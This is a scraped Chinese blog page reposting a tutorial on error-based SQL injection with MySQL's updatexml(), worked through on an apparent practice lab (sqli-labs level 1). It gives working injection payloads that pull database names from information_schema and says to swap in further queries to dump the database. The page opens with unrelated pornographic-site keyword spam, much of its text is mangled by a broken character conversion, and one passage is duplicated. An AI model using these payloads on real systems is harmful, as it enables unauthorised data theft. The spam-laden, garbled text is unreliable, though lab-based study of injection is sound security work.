日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > 数据库 >内容正文

数据库

SQL注入攻击(SQL注入(SQLi)攻击)-报错注入

發(fā)布時間:2024/8/26 数据库 29 豆豆
生活随笔 收集整理的這篇文章主要介紹了 SQL注入攻击(SQL注入(SQLi)攻击)-报错注入 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

頁面沒有顯示位 , 但有數(shù)據(jù)庫的報錯信息時 , 可使用報錯注入

報錯注入是最常用的注入方式 , 也是使用起來最方便(我覺得)的一種注入方式

?

updatexml(1,'~',3);
  • 第二個參數(shù)包含特殊字符時,數(shù)據(jù)庫會報錯,并將第二個參數(shù)的內(nèi)容顯示在報錯內(nèi)容中
  • 返回結(jié)果的長度不超過32個字符
  • MySQL5.1及以上版本使用

本次以SQLi第一關為案例

第一步,判斷注入類型

我們在參數(shù)中加入一個單引號 ' , 看其會不會報錯

?id=1'

數(shù)據(jù)庫返回了一個錯誤 , 從錯誤來看 , 最外層的一對單引號來自數(shù)據(jù)庫的報錯格式 , 我們不用管

1 是我們傳遞的參數(shù) , 1旁邊的一對單引號 , 是SQL中包裹參數(shù)的單引號

而 1 右邊的一個單引號 , 是我們添加的單引號

也就是說 , 后臺SQL中傳遞參數(shù)時 , 參數(shù)包裹的就是單引號 , 固 單引號字符串型注入

第二步,脫庫

我們先來測試一下 , updatexml()是否能正常報錯

?id=1' and updatexml(1,concat('~','my par'),3) -- a

?concat() , 用來拼接字符串 , 觸發(fā)updatexml()的報錯?

數(shù)據(jù)庫把我們的第二個參數(shù)返回到頁面了?

我們把第二個參數(shù) 替換成查詢語句 , 即可獲取到數(shù)據(jù)庫信息

?id=1' and updatexml(1,concat('~', (select schema_name from information_schema.schemata limit 0,1) ),3) -- a

?我們把第二個參數(shù) 替換成查詢語句 , 即可獲取到數(shù)據(jù)庫信息

?id=1' and updatexml(1,concat('~', (select schema_name from information_schema.schemata limit 0,1) ),3) -- a

使用分頁來查詢第幾個數(shù)據(jù)庫 , 0開始

接下來可以將'~' 后面的SQL替換成其他的查詢語句 , 從而實現(xiàn)脫庫?

總結(jié)

以上是生活随笔為你收集整理的SQL注入攻击(SQL注入(SQLi)攻击)-报错注入的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。